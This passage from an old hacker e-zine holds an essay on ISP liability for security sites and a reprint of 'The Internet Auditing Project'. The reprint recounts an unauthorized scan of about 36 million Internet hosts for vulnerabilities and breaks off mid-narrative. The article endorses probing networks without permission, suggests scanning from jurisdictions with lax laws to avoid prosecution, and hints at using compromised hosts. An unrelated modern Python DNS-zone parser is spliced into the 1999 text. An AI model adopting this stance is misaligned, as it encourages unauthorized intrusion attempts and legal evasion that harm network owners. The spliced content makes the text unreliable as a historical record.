In November of 1998, the United States Court of Appeals in Florida ruled against a woman who sued America Online when one of its subscribers, a convicted sex offender, approached her 11-year-old son via an America Online chat group. The appeals court upheld a federal law that protects Internet service providers and online services from inappropriate online transmittals by subscribers. The verdict is being appealed to the United States Supreme Court. This decision also extends to web content. Rather than cite the case to the accuser, the service provider usually caves in quickly and pulls the plug.

There are many other cases that ISPs can cite in their defense. Zeran vs. America Online in 1998 was upheld by the U.S. Supreme Court. It stated simply that ISPs such as America Online are free from liability over material that is carried on their network. Furthermore, the Supreme Court stated that ISPs do not have a duty nor an obligation to remove material found to be offensive. The decision cited the Communications Decency Act of 1996, where ISPs are shown not to be publishers and thus are not treated as such by the law.

Another case is Cubby vs. CompuServe. In this case, the ruling cleared CompuServe of any wrongdoing based on the content of one of its subscribers, stating that ISPs such as CompuServe are secondary publishers, merely providing the means by which documents may be viewed, and had no editorial control over any of the content published on its public web servers. At the most, it removes any kind of offensive material after complaints. Hence, it cannot be held liable for content since it had no previous knowledge of the content.

Interestingly enough, one of the key elements that can help protect security consultants from being run off from a service provider, or that can help a service provider to deal with complaints, is the Communications Decency Act of 1996. It contains clear language that states that "no provider or user of an interactive computer service shall be treated as a publisher or speaker of any information provided by another."

The key is to realize that as a service provider being threatened with lawsuits over content that is found to be defamatory, your company is NOT liable for the content being published by one of your users. That is the law of the land, and by citing these cases to any irate callers, you may be able to defuse the situation in a more diplomatic manner than just booting the offending site off your server or off your router. Remember that these laws also theoretically work in inverse-- if you boot users from your system without warning and you state that the material could get the ISP sued, you could be sued by the user you just booted for wrongful termination. And if the user can show loss of business over this wrongful termination, the ISP could have more problems on its hands than it bargained for.

It should be noted that although ISPs cannot be held liable, users of the system that are publishing the questionable information CAN be held liable. However, a clear case must be made in court to show that the information is erroneous and has caused emotional and financial distress to the plaintiff.

In conclusion, it has been shown that the problems that arise in today's trend of booting "questionable" security sites from servers or from routers arise mainly from a complete lack of education on all sides as to the way that these problems are to be approached. The problems lie not only in the complete disregard of the chain-of-command in reporting a problem, but ultimately also in the total lack of education on the part of the ISP in knowing what its rights are as defined by the American judicial system.

ISPs of any kind seem quick to cave in to the demands of an irate complaint and do not seem to fully think through the situation at hand and the legal precedents for these kinds of complaints before executing a rash decision that does nothing but give other would-be complainers hope that they can also get a web site or web server removed if they complain long enough to their provider. If the rash of sites being taken down by these uneducated people is to stop, then all sides need to be aware of the protocols that are involved in dealing with these problems and the legal cases that support their decisions.

--
CyberChrist
cc@h0use.org
"Sapere Aude"

@HWA

31.0 The Internet Auditing Project
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Aleph One

Security Focus has posted a very interesting report in their guest forum section. The folks at SSR went and scanned 36 million IPs, that was about 85% of the Internet at the time, for 18 common security vulnerabilities. They came up with some rather scary results. The article also introduces the idea of the International Digital Defense Network (IDDN), a possible public interest project which, if implemented, could dramatically influence the security of the Internet. This is a must read for anyone even remotely interested in system security.

Security Focus
http://www.securityfocus.com/templates/forum_message.html?forum=2&head=32&id=32

The Internet Auditing Project
by Liraz Siri
Wed Aug 11 1999

Download the BASS scanner source code.

Introduction

Today, when too many people think of security on the Internet, they think of individual hosts and networks. Alone. Got a problem? Damn! Must be those damn hacker punks. Again. Keep it to yourself. Call the Feds, call the New York Times. Make sure we don't get it. Didn't keep your systems patched? Moron. Don't make us sue you.
With the growing irrelevance of security organizations like CERT and law enforcement on the Internet, an ever growing number of attacks are handled in isolation. Hundreds of millions of Internet users around the world have become accustomed to an Internet beyond boundaries. One site flows to the next, a jungle of software, protocols, media and people connecting, signal, noise, mixing, evolving, together. It seems silly to ignore the security of the system _as a whole_, but we still do. A helpful analogy might be to consider the Internet more a living organism than a neighborhood. A security compromise is can behave more like a disease then a "break-in". It is often contagious and can spread. Remotely exploitable security vulnerabilities are like the natural wounds of the skin. They are relatively rare, sometimes difficult to squirm through, but once inside, infection can begin. This article describes the efforts of a small, independent, security research group to audit some 36 million hosts connected to the Internet, for commonly known security vulnerabilities in an unfocused low-res scan. Why? Because we're a curious bunch, because we've been speculating (rather academicly) over the results for several years, and of course, because we can. Why are we publishing now, Why haven't we published before? We know other groups, working for everyone from the UKUSA SIGINT agencies, foreign intelligence, private corporations and organized crime are not likely, for many obvious reasons, to disclose any "privileged information" to the general public. We feel this is not A Good Thing, and would like to do what we can to help level the playing field. We don't have any money, resources or academic prestige to back us up, but we do have a few, humble insights to share, and we hope these can speak for themselves. 
Besides, wouldn't it be a shame to keep all of our busy work to ourselves, when it could be reaching a much wider audience, spark debate, and maybe even making a difference? Up until now, a couple of issues have held us back. First of all, the timeless responsibility factor. We could not avoid the possibility (certainty?) that our work would be abused by malicious parties and we've all seen before how easy it is for people to point the finger. Secondly, we've been busy and publishing involves a significant investment in time writing articles, cleaning code, reaching the potential audience and reading (sometimes answering) endless e-mails. Walk forth in dread So you want to scan the millions of computers on the Internet from Japan to Egypt to Florida? Reach out and audit the networks of Internet Service Providers, corporations, universities, government facilities, banks and sensitive military installations? First, take another moment to think about it. Many people get nervous on the receiving end of an uninvited security audit, and you'll eventually step on quite a few toes. In some countries, you can even expect unpleasant house-calls from local law enforcement which will brand you a criminal for your unusual efforts. Citizens of a large democracy with many three letter agencies should be aware that a fully-equipped SWAT team is likely to tag along. While this may deter, possibly comfort law-abiding readers, a criminally inclined party is not without it's options. Resources are abundant on the Internet, and many suitable, unsuspecting, high-bandwidth volunteers are not hard to find, with the modest help of your favorite bulk auditing software. Not intimidated? That's the spirit! Quick & Dirty Overview Let's take a look at some of the basic ingredients we're going to need: 1.Some wheels. (BASS, a Bulk Auditing Security Scanner) 2.A map. (address search space) 3.Fuel. 
(resources)

Although they are not required, logistical management skills, competence and patience can also come in real handy.

Wheels

The Internet is getting rather big these days, and exploring its tens of millions of unique hosts is by no means an easy task. Manually, we could never get the job done. Fortunately, we can let a computer (or several) do most of the dirty work, allowing us to concentrate on coordination and management. Assuming, of course, we have the right software. In this case, we're going to need a robust bulk security scanner that can monotonically run for weeks, even months at a time, efficiently processing millions of addresses, generating gigabytes of traffic and surviving everything from broken routing, to system shutdowns and unfriendly sysadmins.

Since we've never liked re-inventing the wheel, the first thing we did (circa Sep 1998) was take a look at existing scanning software. We were disappointed. There was no shortage of software, from Satan to Nessus, with a jungle of (often silly) cracker tools in between, but none of them would do. Nessus was impressive, but clearly not designed with bulk in mind. Most of the rest were unreliable, poorly written, slow and inextensible. Primitive, specialized scanners (foobar-scan) were also common, and equally useless. So, it looked like we'd need to write "Yet Another Security Scanner" ourselves.

During development, we were careful not to complicate the design and code any more than we had to, aware of the many virtues of simplicity (especially in security software). Our goal was producing a scanner which was reliable, efficient and extensible. After several weeks of on-off programming, the first alpha version of BASS, the Bulk Auditing Security Scanner, was ready for its first test run. Israel was the first target in a series of trials. At this point (Sep-Oct 98) BASS could only identify 4 common security vulnerabilities, but adding more later was a simple matter.
What we really needed to evaluate was how well the multi-threaded scanning architecture worked.

"beware the bugs that bite beta programs"

It didn't. Even with a small target like Israel, the scan came to a final halt after about 18,000 addresses. It seemed threads would occasionally freeze, waiting for service from a host they knew was online, but behind a misconfigured firewall, or a broken router. The frozen threads were rare but persistent. They would build up in BASS's scheduler over time, eventually choking the scanner to a grinding halt. A fail-safe timeout circuit fixed the problem, and we tried again. This time, the scan finished on schedule. 110,000 addresses in under 4 hours, on a dual ISDN 128k connection.

We selected the United Kingdom, with an address space of 1.4 million, for our next trial. If there were any further bugs, they were going to show, and they did. Around a million UK addresses later, BASS broke down and was dragging the entire system down with it. This time, several obscure memory leaks had slowly inflated BASS to monstrous proportions, consuming all available system memory. Several further painful debugging sessions were needed to bring the scanner up to par, during which 5 million addresses around the world had been scanned.

Now that the architecture was stable, we proceeded to familiarize BASS with the wonders of CGI and RPC, allowing the scanner to test for up to 18 widely known security vulnerabilities (see detailed listing in suffix item 1). The tests were designed to reduce false positives and false negatives to a minimum, combining passive (server's version header) and interactive (server's response to ill-formed input: a buffer-overflow, sneaky characters) implementation signatures to determine vulnerability. So now we could sit back, feed BASS a really big map of the Internet, and wait a few months (or weeks, depending on our resources) for results.

Download the BASS scanner source code.

A map.

- A map you say?
Yeah, well what I really mean is a really long list of "all" the computers connected to the Internet. Please note the term "all" is used loosely ("most" or the "majority" would probably be more accurate).

- How many of them are there anyway?

Reader, that's a tougher question than you might think. An Internet Protocol address, or IP for short, is a 32 bit integer. This means there are 2^32 (4.3 billion) possible unique IPs, the IP address space. In practice, only a very small fraction of this space is really used. Due to the anarchic nature of the Internet, nobody has any exact figures on usage statistics, but most estimates (circa Jan 1999) settle around 100 million users worldwide. The number of computers online is more around an order of magnitude lower (15 million). This is because most users still access the Internet dynamically, by dialup, over phone lines. ISPs (Internet Service Providers) can often manage to provide service with an address pool 4 to 10 times smaller than their customer base.

Ideally, since BASS is (currently) Unix oriented, we would like to eliminate any non-Unix computers (not that non-Unixes are any more secure, quite the contrary) from our Really Big List. We would also want to skip any dynamic IP pools. In a perfect world, this would be a good idea. In ours, eliminating poor scanning candidates in advance would actually take longer than the scan itself. Optimizing a scan this way is only useful if you plan on repeating it frequently.

- I'm confused, how many IPs are we going to end up scanning?

That depends... In our case, we ended up scanning around 36 million IPs, which we estimate covered 85 percent of the active address space at the time. Keep in mind, however, that the Internet is growing very quickly, so these numbers will get bigger by the time you try this out yourself. Search for "Internet Surveys" on the web, and get an updated figure.

- Wait, what's with the 85 percent?
Calm down, mapping the entire used IP space is nearly impossible, even assuming you can agree with anyone else (try Usenet folks first!) on what "used" should mean. The main problem is that using an IP is an internal decision organizations with an allocated slice of the address space make for themselves. All those slices add up to 300 million IP addresses, of which only 5 percent have a computer at the other end, so we need to narrow down our search space. This is where the Domain Name System (DNS) comes to the rescue. The DNS is a tree structured lookup directory used (primarily) to map a hostname to an IP and vice-versa (www.nsa.gov <=> 208.212.172.33). By convention, most of the Internet's active addresses are registered with the DNS, although this is not a mandatory requirement.

- So we can just download the DNS's records from the Internet?

Yes, and no. The DNS protocol has an "AXFR zone transfer" mechanism designed to allow one DNS server to mirror the contents of another; by requesting an AXFR zone transfer, you can download a server's records. This is helpful in providing for redundant backups, should the primary server fail. Unfortunately, since the DNS is a distributed system, we can't just download its complete contents from any central authority. To make matters worse, many DNS servers nowadays (40 percent) refuse zone transfer requests, due to several (misunderstood) concerns over its security implications.

- Sounds rough.

Well, if you're going the do-it-yourself way, it's not going to be easy, but it isn't as difficult as it sounds. Let's take a look at some of our options (If you aren't the do-it-yourself type, skip to item 4):

1. A top-down recursive download of the DNS.

Using the DNS protocol's AXFR zone-transfer mechanism it is possible to recursively download the DNS's contents one zone at a time. In practice, however, this method is usually reserved for mapping a known target that has not explicitly restricted zone-transfers.
Trying to map the DNS this way has the disadvantage of being slow, unreliable and incomplete. A description of the process is available in RFC1296.

2. Exploiting in-addr.arpa.

We start off by recursively downloading the DNS's relatively small in-addr.arpa. domain. This will give us the allocated address space (300 million IPs). Most of the active addresses (the ones we want) in this space will have a PTR record somewhere in the in-addr.arpa domain (so they can be mapped in reverse from IP numbers to hostnames). Many Internet protocols and applications rely on this pointer, by convention, so it is not likely to be absent on purpose. Unless the address isn't being used, of course, but we don't want any of those anyway. By checking to see which IPs in the allocated address space have a pointer in the in-addr.arpa. domain, we can narrow down the search space to about 13 percent (45 million IPs).

This process demonstrates that the ever popular practice of blocking zone-transfers will not hide a network's topology. People relying on this method to obscure their security problems are begging for trouble. BTW, 'Network Wizards' have been doing their Internet Survey this way since the beginning of 1998, check them out. (http://www.nw.com/)

The job is likely to take between a week and a month (or several), depending on how much available bandwidth you have, and the quality of the software you're using to get it done.

3. Scavenging Network Information Centers for pre-compiled lists.

It turns out some NICs have precompiled data files available over anonymous FTP. Getting the data this way is much easier, faster and more reliable than slowly milking the DNS through the traditional AXFR zone-transfer protocol. As of Nov 1998, RIPE (ftp.ripe.net) was offering raw output files from its recursive hostcount (covering Europe, Russia and others, 98 countries in total) for download at ftp://ftp.ripe.net/ripe/hostcount.
Update: On 01/02/1999 they restricted anonymous FTP access to the raw hostcount output files. You now have to either convince RIPE you really need them at hostcount@ripe.net (for saving the world, no less) or grab them at one of RIPE's many mirrors.

Network Wizards, the guys doing the Internet Survey, offer (some) of the raw data from their older surveys, up to 1997, at "http://www.isc.org/ISC_HTML/domainsurvey/archive-data/".

ARIN (http://www.arin.net), the American Registry for Internet Numbers, is an interesting site to look into. While you're reading exciting new number policies, grab ftp.arin.net/domain/inaddr.zone over anonymous FTP. (Doing a zone-transfer takes so much longer.)

There are hundreds of NICs, structured hierarchically. Search the web for "Network Information Centers", and you'll find quite a few. APNIC (Asia Pacific) and JPNIC (Japan's NIC at NIC.ad.jp) are two you should really look into.

Then there's InterNIC, run by Network Solutions (NSI, the "dot com" guys), in charge of the root servers ([A-M].ROOT-SERVERS.NET) at the root of the Internet's DNS, all the three letter top level domains (com, net, org, edu, gov and mil) and the top level in-addr.arpa. domain (for reverse lookups). InterNIC is the closest thing the Internet has to a central authority on anything, and is currently being run as a lucrative for-profit US-government sanctioned monopoly. InterNIC no longer provides anonymous FTP access to most of its DNS records, with the exception of the top-level in-addr.arpa. domain, stating it is trying to prevent spammers and squatters (domain name speculators) from abusing the DNS. As such, InterNIC will only offer FTP access to "organizations that can demonstrate a technical need for the information". Fortunately, the information is already out there, available on several anonymous FTP sites hosted by InterNIC affiliates (government, military, educational, etc.) who share its records, but do not enforce its censorship policies.
Personally, we downloaded the top level .com, .net, .org, .edu, .mil and .gov domains from ftp.nic.mil (the first NIC we tried) several minutes after a disappointing encounter with an almost empty 'domains' directory at ftp.internic.net. (Update: ftp.nic.mil no longer provides these records over anon FTP.)

4. The Greener Path

The Internet Software Consortium (http://www.isc.org), of the bi-annual "Internet Survey", is offering its raw data sets for resale through MIDS, Matrix Information and Directory Services (http://www.mids.org) at $2500. Frankly, shelling out the green is a lot easier, faster and even less expensive than trying to compile the data yourself, especially if you don't already have the software, expertise and bandwidth to pull it off.

- What about you guys? What did you do?

We like banging our heads against the wall, so we went down the slippery do-it-yourself path. We started off by learning as much as we could about the DNS, reading any RFCs that were relevant to the protocol, browsed through the documentation of its most popular implementation "BIND", downloaded a zoo of freely available DNS utilities from the major FTP sites and read lots of source code. Eventually we ended up hacking a couple of popular DNS utilities, wrote way too many ugly shell scripts, C application wrappers, and some pretty silly Perl filters, mixing a lot of method 3 (scavenging), 2 (in-addr.arpa.) and just a bit of 1 (vanilla zone-transfers). If you have any good sense, you'll do otherwise.

Fuel

Swarming the Internet with probes requires some resources, bandwidth mostly. How much of it you need depends on how flexible your schedule is. Generally speaking, you're likely to find you need a lot less of it than you might first imagine.
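The in-addr.arpa narrowing of method 2 above, worked through in code. This is an added example and not part of the article or of BASS: it parses reverse-zone text (honouring $ORIGIN, comments, blank owners, TTL and class tokens), converts between IPs and their in-addr.arpa names, treats NS delegations as the allocated space, and reports how much of that space actually carries a PTR. The zone text is constructed; only the www.nsa.gov mapping is taken from the article.

```python
import ipaddress

REV_SUFFIX = "in-addr.arpa."


def reverse_name(ip: str) -> str:
    """208.212.172.33 -> 33.172.212.208.in-addr.arpa. (the RFC 1035 reverse name)."""
    octets = ip.split(".")
    if len(octets) != 4 or not all(o.isdigit() and int(o) <= 255 for o in octets):
        raise ValueError(f"not a dotted-quad IPv4 address: {ip!r}")
    return ".".join(reversed(octets)) + "." + REV_SUFFIX


def _reverse_octets(name: str):
    """Octets of an in-addr.arpa. name, most significant first, or None."""
    name = name.lower()
    if not name.endswith("." + REV_SUFFIX):
        return None
    parts = name[: -len(REV_SUFFIX) - 1].split(".")
    if not all(p.isdigit() and int(p) <= 255 for p in parts):
        return None
    return list(reversed(parts))


def ip_from_reverse(name: str):
    """Inverse of reverse_name(); None unless all four octets are present."""
    octets = _reverse_octets(name)
    return ".".join(octets) if octets and len(octets) == 4 else None


def block_from_reverse(name: str):
    """A delegation point (1 to 3 octets) as the /8, /16 or /24 it covers."""
    octets = _reverse_octets(name)
    if not octets or not 1 <= len(octets) <= 3:
        return None
    padded = octets + ["0"] * (4 - len(octets))
    return ipaddress.ip_network(".".join(padded) + f"/{8 * len(octets)}")


def parse_reverse_zone(text: str):
    """Collect NS delegations (allocated blocks) and PTR records (active IPs)
    from zone-file text. Returns (blocks, {ip: [hostnames]})."""
    origin, owner = REV_SUFFIX, None
    blocks, ptrs = [], {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].rstrip()        # drop comments
        if not line.strip():
            continue
        fields = line.split()
        if fields[0] == "$ORIGIN":
            origin = fields[1] if fields[1].endswith(".") else f"{fields[1]}.{origin}"
            continue
        if fields[0].startswith("$"):               # $TTL, $INCLUDE: not needed here
            continue
        if not line[0].isspace():                   # leading blank = previous owner
            owner = fields.pop(0)
        if owner is None:
            continue
        while fields and (fields[0].isdigit() or fields[0].upper() in ("IN", "CH", "HS")):
            fields.pop(0)                           # optional TTL and class tokens
        if len(fields) < 2:
            continue
        rtype, rdata = fields[0].upper(), fields[1]
        fqdn = origin if owner == "@" else owner if owner.endswith(".") else f"{owner}.{origin}"
        if rtype == "PTR":
            ip = ip_from_reverse(fqdn)
            if ip:
                ptrs.setdefault(ip, []).append(rdata)
        elif rtype == "NS":
            block = block_from_reverse(fqdn)
            if block and block not in blocks:
                blocks.append(block)
    return blocks, ptrs


def narrow_search_space(blocks, ptrs):
    """Allocated address count, the PTR-bearing IPs inside it, and their share."""
    nets = list(ipaddress.collapse_addresses(blocks))   # merge nested delegations
    allocated = sum(n.num_addresses for n in nets)
    active = sorted(ip for ip in ptrs if any(ipaddress.ip_address(ip) in n for n in nets))
    pct = 100.0 * len(active) / allocated if allocated else 0.0
    return allocated, active, pct


# Constructed sample zone text (not registry data). The www.nsa.gov mapping is
# the one quoted in the article; every other name here is made up.
SAMPLE_ZONE = """\
$ORIGIN in-addr.arpa.
212.208     IN NS  ns1.example.net.     ; delegation => 208.212.0.0/16 allocated
$ORIGIN 172.212.208.in-addr.arpa.
@           IN NS  ns1.example.net.     ; nested /24, must not be double counted
33          IN PTR www.nsa.gov.
34          IN PTR mail.example.net.
            IN PTR mx2.example.net.     ; blank owner: same IP as the line above
35   86400  IN PTR gw.example.net.      ; explicit TTL before the class
300         IN PTR bogus.example.net.   ; octet out of range, must be ignored
"""

if __name__ == "__main__":
    blocks, ptrs = parse_reverse_zone(SAMPLE_ZONE)
    allocated, active, pct = narrow_search_space(blocks, ptrs)
    print(f"allocated {allocated} addresses, {len(active)} with a PTR ({pct:.4f}%)")
    for ip in active:
        print(f"  {ip:<16} {reverse_name(ip):<32} {', '.join(ptrs[ip])}")
```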
The good news is that scans are easy to parallelize, so you can divide the load over as many different computers and networks as you have access to, to either get the scan finished faster, or to consume fewer resources from each participating scanning node. This is similar logistically to the distributed computing effort used to break a cryptographic key challenge. The difference is that our effort consumes network bandwidth instead of CPU cycles, and is much, much easier.

How much easier? (Assuming a search space of 40 million IPs...) One workstation running BASS, with enough memory (to support hundreds of scanning threads), and a T3's equivalent in bandwidth, could probe the entire Internet in under a week at about 4500 JPM. (Jobs Per Minute, the scanner's schedule goal, set on the command line at the beginning of a scanning session, or during recovery.) At the other extreme, a small dispersed group, running BASS on 10 personal computers with dialup-strength connections, could probe the entire Internet in a month or so at a modest 90 JPM each (around 2 kilobytes/second).

A minor detour, introducing IDDN (the International Digital Defense Network)

All of this brings us to an interesting idea we've been playing around with that could dramatically influence Internet security for the good, if / when it is eventually implemented. Frankly, the idea deserves an article of its own, but since we are so busy, we will introduce it here. Inspired by the high response to cryptographic key challenges, distributed.net and the SETI effort, we envision a non-profit foundation, which we like to ambitiously call IDDN, the International Digital Defense Network, working in the public interest to organize massively distributed scanning efforts which routinely probe the Internet for security vulnerabilities. 10,000 participants could finish a scan cycle every 2-3 days at an insignificant single JPM each.
At the end of a cycle, an automated system could draw the attention of administrators worldwide to some of their local security problems, and offer whatever information and solutions (bug-fixes, patches, workarounds) it has on database (patches, advisories, exploits). In our opinion, such an effort is highly practical and could contribute more to the stability and security of the Internet than the traditional (somewhat pointless?) bruteforce crypto key challenges. We believe organizing an Internet neighborhood-watch of sorts is in everyone's interests, especially the Internet's commercial industry, which depends on the Internet to eventually fulfill its potential for global electronic commerce. We do not have the time or resources to get the IDDN off the drawing board by ourselves and would be interested in the community's input on this issue.

Let the show begin

Tuesday, 1 December 1998. We've installed BASS on 8 Unix boxes around the world, each with at least 512kbps bandwidth. 8 different geographically located participants in 5 different countries: Israel (1), Mexico (1), Russia (2), Japan (2) and Brazil (2). Two machines have already proven their strength during the scanner's painful debugging sessions. Three more will join them for the first time when we begin. The others are backups, ready in case anything goes wrong, and frankly, we have some concerns. Mostly, we expect the scan to raise some complaints, especially passing through the Internet's sensitive military, government and private networks, where snooping around is nothing short of a shooting offense, the prelude to a full-blown attack. Our probes 'come in peace', so to speak, but how can they know? They'll perceive us as a threat and could very well retaliate. We want the scan over before the new year, so we've set BASS's schedulers to finish in 3 weeks, at 250 JPM x 5. If all goes well, we'll be going over the results in the last week of 1998.
If not, we'll have an extra week (at least) to fix whatever comes up and still be on schedule. An interesting point to note is how we've constructed the search space. We'll cover the domains by size, starting with the smaller domains first, so by the first week we'll have finished scanning 216 of the 228 active domains in the DNS (*.org, *.gov, *.int, and 212 countries, from Afghanistan with 1 host to the UK with 1.4 million). We create the individual search space of each participant by dividing the global space the same way you would deal a deck of cards, so that the original scanning order is preserved.

At 02:00 GMT, we flip the switch, so to speak, activating BASS on the five participating hosts. Since these have all been configured to automatically recover from any power failure or unexpected system shutdowns, we really don't have much to do now, besides keeping a lazy eye on progress.

First week

There is definitely a response out there to the scan, but it's much friendlier than we anticipated. Harmless acts of mindless automata and mutual curiosity, mostly. Pings, traceroutes, telnet sessions and finger attempts. Four to eight portscans a day. An occasional TCP/IP stack exercise, an OS fingerprint, a few mostly polite e-mails asking why our network was "attacking" theirs, frequently warning us that crackers may be abusing our systems, suggesting we look into it. Very mild, we are running into much less hostility than we expected. People either don't realize the scope of the scan, or don't care. On an individual basis, one quick security probe isn't usually enough to get the local sysadmin to notice. Those who do are probably security conscious enough to keep their networks up to date anyway, and confident enough to keep their cool when yet another 13 year old punk (who else?) bangs on their network walls. Oh, did we mention the scanner is precisely on schedule?
12 million hosts scanned by the end of the week, covering the US government's *.gov domain, Canada, Australia, Europe, and a window to some of the most intriguing corners of the world: hostile mind-control regimes like China and Iran, for example, which suffocate their repressed population's access to free ideas and information, but are still paradoxically connected (albeit very poorly) to the Internet. Third world potentials like India (the world's largest democracy!) and the rapidly developing countries of the far east. Exotic paradise locations like the Cocos Islands, Bahamas, the Virgin Islands, Barbados, Fiji, and Micronesia. All of them as close and accessible as if they were right across the street, and in a certain way even closer. Computer expertise is rare in many of these countries, security expertise even rarer. Cracking into a Chinese computer half a world away, for example, is usually easier, more interesting, and safer (assuming you are not in Chinese jurisdiction, of course) than cracking into a comparable western computer.

As a precaution, all eight participants have backed up the 13 MBs worth of precious results, to make sure an emergency relocation recovery is possible, should this become necessary. (I.e., in case of a small thermonuclear attack on one or more scanning participants, possibly affecting their performance. Caution, nuclear warfare can really ruin your entire scan.)

Second week

We started the week off by scanning US Military networks. Admittedly, we were pretty nervous, and spent much of the day keeping an eye out for telltale signs of a pissed off military retaliation (also known as "InfoWar" and "spooky shit" in professional terminology). In just under 24 hours it was all over, and while we did notice a significant increase in the number of probes we were getting, to say we were not impressed by the security of the military network is a big fat major understatement.
This might not be a problem, since according to NCSC (National Computer Security Center) network security policies, none of the systems on the public *.mil network could qualify for the storage and handling of classified DoD (Department of Defense) information. How strictly these policies are adhered to is another matter. And even if they are (and this is a _big_ if), the DoD is still (justifiably) concerned that crackers might glue together classified information from the little pieces of unclassified information fragments lying around their *.mil network (in great abundance). So they have plenty of good reasons to keep their network secure, but are (un)?fortunately doing a pretty lousy job.

DoS six o'clock

Wednesday, our Russian scanner runs into trouble. A denial of service attack, a 512kbps stream of packets amplified 120 times over an unsuspecting Canadian broadcast amplifier. Half a world away, the packet storm brings a large Russian ISP to its knees, overwhelming its available bandwidth. Ouch. Apparently, we stepped on someone's toes. At first, we assumed this was somehow connected to yesterday's *.mil scan, but no, it was just some ill-tempered English fellow who didn't appreciate getting probed last Monday. He tried crashing our stack first, with some nasty DoS attacks for NT and Unix. That didn't work, so he blasted our ISP out of the sky. Clear and simple, he didn't want to, but we left him no choice. You can't have decent English folks being poked around at by some Russian punks...

The attack lasted 16 hours straight, and since it wasn't too difficult to track down where it was coming from, we were very tempted to return the favor, or at least give this trigger-happy netizen a free security audit. We didn't though, the net's resources are much too valuable to further waste on such a brutish exhibition of ego (a "cyber" pissing contest?). Besides, an eye for an eye and everyone goes blind, right?
Anyway, one of our backups (also in Russia) quickly substituted for the lost computer as soon as we noticed the attack 6 hours later, at 255 JPM, with no other significant setbacks to our week's schedule. The rest of the week chugged along nicely, scanning the United States (or more precisely, the *.us domain), Japan (*.jp), and the educational networks (*.edu). Hmmm, has anyone noticed how unsymmetrically biased the DNS is in favor of the United States? Dot gov, dot mil, dot org, dot edu. Being so homogeneously American, shouldn't these go under the *.us domain?

"You're gonna rot in jail" - the legal corner

We began receiving e-mails this week from people with a lot less tolerance for our activities, most in delayed response to last week's scans. Some of these were written by lawyers who informed us we were either supporting or perpetrating acts of computer crime against their clients. They had notified the authorities (CERT and the FBI were commonly cited) and threatened to take us to court if we did not offer our full cooperation in immediately identifying the attacking party. Right... It seems some organizations hire fulltime "security officers" known for exaggerating the significance of petty incidents to justify getting paid. Unfortunately, in certain parts of the world, charges like these can cost you a fortune in legal defense, and with the wrong judge, a conviction, and a sentence anywhere between a large fine and a few years in jail. Fortunately, on the Internet, getting around this is as easy as scanning from places which are not known for overzealousness in regard to their definition of "computer crime". This is just another example of how poorly the local and international legal system deals with so called "computer crime" and the Internet. Under the (US) state of Oregon's computer crime law (164-377a), for example, we could definitely be defined as computer criminals, tried and sent away to many years in prison. (But so could everyone else...)
A chosen excerpt from the law:

(4) Any person who knowingly and without authorization uses, accesses or attempts to access any computer, computer system, computer network, or any computer software, program, documentation or data contained in such computer, computer system or computer network, commits computer crime.

As you can see, the law is unreasonably vague. "Criminal" or not, it all comes down to your definition of "authorization". But having it would constitute some sort of prior agreement between a user and the owners of a computer, computer network or computer software. The Internet, however, is a public network, and the majority of its services are used anonymously, by users with which there is no persistent relationship.

In the physical world, any behavior is possible, so society enforces order by restricting behavior it finds unacceptable through the regulative government system, which is "programmed" by the code of the law. The computer world is pure code, instructions and information, none of which are capable of discrimination. The computer programmer is the god of a perfectly obedient universe. Like the artist, the canvas of his creation is as expressive or inexpressive of his will and intention as he has made it to be. This means software, like the law, can inherit the imperfections of its creator. Poorly written computer and legal code can allow the system to behave in conflict with the original intentions of the men who wrote it. Legal loopholes and software bugs, lawyers and hackers, different sides of the same coin. The only way to really prevent the abuse of the system is to write better code.

This is the reason we find most "computer crime" legislation so absurd. The laws try to protect computer systems from being misused, when the only definitive expression of what constitutes "acceptable use" is in the code itself, which may or may not be a precise manifestation of the author's intentions, depending on his competence as a programmer.
If the public insists on "computer crime" legislation anyway, we believe most of its problems could be easily resolved by eliminating ambiguous wording, over generalization, and specifically breaking down what the law defines as acts of "computer crime":

1. Knowingly exploiting a finite list of common misimplementations (buffer overflow, a race condition, ...)
2. Intentionally performing a Denial of Service attack.
3. Wiretapping (sniffing a network, capturing keyboard strokes, screen content, etc.)
4. Using a party's identification token[s] (username / password) without the party's permission. (Logging into a system on someone else's account, reading someone else's email.)
5. Spam. (Death penalty for repeated offenders.)

Note that we've removed "attempted" attacks from the offense list, since these are hard to define, prove, and cause no damage. (If in the course of an attempted attack a system is damaged, in a denial of service attack for example, then we can prosecute this event as a separate incident, with nothing "attempted" about it.)

Interested readers are advised to read up on the Oregon vs. Randal L. Schwartz case, a good example as to why Draconian "computer crime" legislation should be fought with a vengeance. (http://www.lightlink.com/fors)

Third week

Last week. Only the mammoth *.com and half of the *.net domain left and we're done.

they're heeeere...

Friday, our Japanese participants discover that a computer on their company network has been cracked into, one very secure Linux box running only SSH and Apache 1.3.4. Now this would definitely send a chill up your spine if you knew just how fanatic our friends are when it comes to network security. Furthermore, they only detected the intrusion three days after the fact, which is unbelievable when you consider the insane monitoring levels they've been keeping since they agreed to participate in the scan.
They would have noticed any funny stuff, and in fact, they did, lots of it, but none of which came close enough to a security breach to raise any alarms. Readers should also note how, although a key binary in the cracked machine had been modified, tripwire and an assortment of other booby traps failed to detect this had happened. Even a close-up manual inspection (comparing file contents with a trusted backup, playing with its name) could not detect any odd behavior. This trick, and others equally spooky, were achieved by clever manipulation of the OS's kernel code (dynamically, through a module).

Other characteristics of the attack which make it so eerily sophisticated:

1. The attacker (convincingly) masquerades as a local employee.

The attacker knows the employee's username and password and is even connecting through the employee's Japanese ISP on the employee's account! (The phone company identified this was an untraceable overseas caller.) This information could not have been sniffed, since network services are only provided over encrypted SSH sessions. Further investigation shows that this employee's personal NT box, connected over a dynamic dialup connection, had been cracked into 4 days earlier. His ssh client (TTSSH extension to TeraTerm) had been trojaned to transmit XOR garbled account information (hostname/username/password) over pseudo-DNS udp packets to a refurbished i486 Redhat v4.2 box used as a single-purpose cheap Samba fileserver in a small Australian ISP. The little box was every cracker's dream, a discreet, utopian crack haven, installed by a former Linux-savvy administrator, the last of its kind in a homogeneous Unix-illiterate Microsoft environment. The ISP practically ignored the box, which was running (up 270 days straight) so reliably none of them had even bothered to log in since mid 1997! So as long as the crackers kept Samba running, they would have the box completely to themselves.
